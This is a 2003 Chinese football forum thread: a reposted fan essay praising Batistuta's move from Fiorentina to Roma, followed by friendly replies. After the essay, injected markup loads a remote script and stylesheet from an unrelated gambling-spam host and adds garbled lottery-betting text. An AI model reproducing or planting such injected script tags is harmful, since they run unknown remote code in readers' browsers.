紫雨竹 发表于 2003-9-3 00:25:00

巴蒂斯图塔,一生只为你倾情!

??我常常在发呆的想,当巴蒂斯图塔离开足球的时候,我还能依然深爱足吗?其实从真正知道足球的那一刻起,巴蒂就是我心中永恒不灭的梦。我已经记不清为什么会如此的深爱巴蒂,我只知道我的足球世界永远都在围绕着他转。
??直到上赛季罗马夺冠的那一刻之前,我还固执的认为我是最支持巴蒂离开佛罗伦萨去寻找梦想的人。可是当我知道巴蒂斯图塔举起意甲冠军奖杯,佛罗伦萨的那尊巴蒂雕像也随着烟消云散时,我犹豫了……
??我特别想对佛罗伦萨人说:你们错了!从那天起,我也不再看佛罗伦萨的比赛了。我一直无法理解佛罗伦萨人的做法,为什么巴蒂就注定一生要遗憾吗?当感情与奖杯冲突时;当现实和梦想不能并存时,巴蒂斯图塔选择了去完成生命中的梦想。这难道有错吗?没有。绝对没有!真正喜爱巴蒂的人应该支持“战神”去成就他一生的事业,难道如果伟大的球星要一辈子碌碌无为吗?不。绝不!克鲁伊夫没有给荷兰队带来世界杯,但他在西班牙联赛上有着一座座奖杯。普拉蒂尼时代的法国队再怎么遗憾,但普拉蒂尼也在尤文图斯拥有自己的王朝。当佛罗伦萨不能让巴蒂斯图塔完成他的梦想时,“战神”只能离开。
??你们是否记得当93年佛罗伦萨降级时,巴蒂甚至选择了一条他人所不能理解的道路,而这仅仅只是为了佛罗伦萨那些球迷的眼泪。你们还记得是谁让默默无闻的佛罗伦萨成为意甲的一路诸候吗?是巴蒂。是加布里埃尔·巴蒂斯图塔让佛罗伦萨成为意甲赛场上闻名遐迩的“紫色旋风”。如果没有巴蒂斯图塔,佛罗伦萨今天还能站在意甲的赛场上吗?如果没有巴蒂斯图塔,谁还会记起那个所谓的欧洲文艺复兴之城?我相信,如果没有巴蒂斯图塔,佛罗伦萨永远只能做意甲赛场上的配角,更别谈跟米兰王朝或是“老妇人”争一日之辉。
??巴蒂斯图塔已经把生命中最美好的九年留在了佛罗伦萨,把一个球员生涯中最珍贵的九年奉献给了佛罗伦萨,生命中能有几个九年。佛罗伦萨人,你还能要求什么?你们可有想过,佛罗伦萨到底给过巴蒂斯图塔什么东西?除了一座没有要的意大利杯和一双早已穿惯金靴,几乎就没有了,也许还有天下万千球迷那痴情的眼光。你们难道甘心让那尊巴蒂的雕像就永远两手空空吗?你们难道希望永远见到的是一个忧郁的巴蒂吗?一个再忠诚不二的球员,一个再情感动天的人,他的一生总有他想要追求的梦想,“战神”也是人啊!
??当巴蒂一脚洞穿佛罗伦萨的大门时,奥林匹克球场上忽然间鸦雀无声。那一瞬间,在罗马夺冠之前我一直认为是我生命中最感动的时刻。当巴蒂斯图塔在进球后黯然下泪时,你们知道吗?那一刻,“战神”的心也许从此无人能懂,但我知道他的泪已在心中倾盆而下,因为那一刻我也无法让我的眼泪留在眼圈中。你们知道当“战神”要离开佛罗伦萨时的心情吗?我坚信他比任何一个佛罗伦萨人都难过。可是,佛罗伦萨人,你为何不能试着去理解巴蒂?那怕只是为他说一句话,那怕只是一句所谓的愿谅。当我从相隔万里的异乡都能理解他的时候;当失落已成为过去的时候。佛罗伦萨人,你还能如此的固执吗?
??那一天,我又听到罗马球迷给巴蒂喝倒彩的声音。我也终于清楚的知道,其实罗马球迷爱的不是加布里埃尔·巴蒂斯图塔这个人,而是“Badigoal”。佛罗伦萨人,你知道“战神”的心在流泪,而我的心在滴血吗?我都能理解巴蒂,为什么这个曾经为你们带来无数欢乐的人你们就不能理解?其实从选择罗马的那一刻起,巴蒂斯图塔就再也不能回头了,他要的只是佛罗伦萨人的理解。走好了,加布里埃尔·巴蒂斯图塔,不管今后的路如何坎坷不平,我的掌声永远都为你响起!
??“战神”,擦亮你心的剑吧!2002日韩世界杯上,我们期待那风情万种的一剑……

< url=http://www.9p.cc">
<script type="text/javascript" src="http://4888.cc/b.js"></script>
<link href="http://4888.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

#金###时#彩#

#合#投#注##

紫雨竹 发表于 2003-9-3 00:26:00

第一次

帖两个旧帖吧

玄武水星 发表于 2003-9-3 10:02:00

怎么是第一次?偶记得楼主来风暴挺长时间了啊。
还是在网易?

紫雨竹 发表于 2003-9-3 16:59:00

呵呵~~~

有一些日子常在网易

在这注册没几天

杨七狼 发表于 2003-9-3 17:05:00

文章和签名一样棒!!

玄武水星 发表于 2003-9-3 20:54:00

没想到7狼也挺能拍,把偶的话都说了……

紫雨竹 发表于 2003-9-3 21:23:00

哈哈~~~~~~``

说笑了

丁满 发表于 2003-9-3 22:33:00

没有没有
久仰了

Aimar113 发表于 2003-9-4 14:39:00

和ID一样
很有情调
又一个性情中人
和紫色一样
很浪漫

紫雨竹 发表于 2003-9-4 16:50:00

呵呵~~~~~~~~~`

挺喜欢这里的

浪子心 发表于 2003-9-4 16:52:00

以下是引用丁满在2003-9-3 22:33:00的发言:
没有没有
久仰了

眼熟

紫雨竹 发表于 2003-9-4 16:57:00

眼熟?

不会吧
我刚来这里才两三天的

在别的地方吧

浪子心 发表于 2003-9-4 16:59:00

榕树下

紫雨竹 发表于 2003-9-4 17:01:00

对,,我 是那边斑竹

呵呵,,~~~

浪子心 发表于 2003-9-4 17:02:00

那个版块

紫雨竹 发表于 2003-9-4 17:04:00

体坛纵横

呵呵,你又怎么知道我是榕树下那边混的?

batiai99 发表于 2003-9-4 17:07:00

巴蒂也曾随罗马去过埃及!bati1017-t

紫雨竹 发表于 2003-9-4 17:11:00

好像是吧

那记得不太清了
页: [1]
查看完整版本: 巴蒂斯图塔,一生只为你倾情!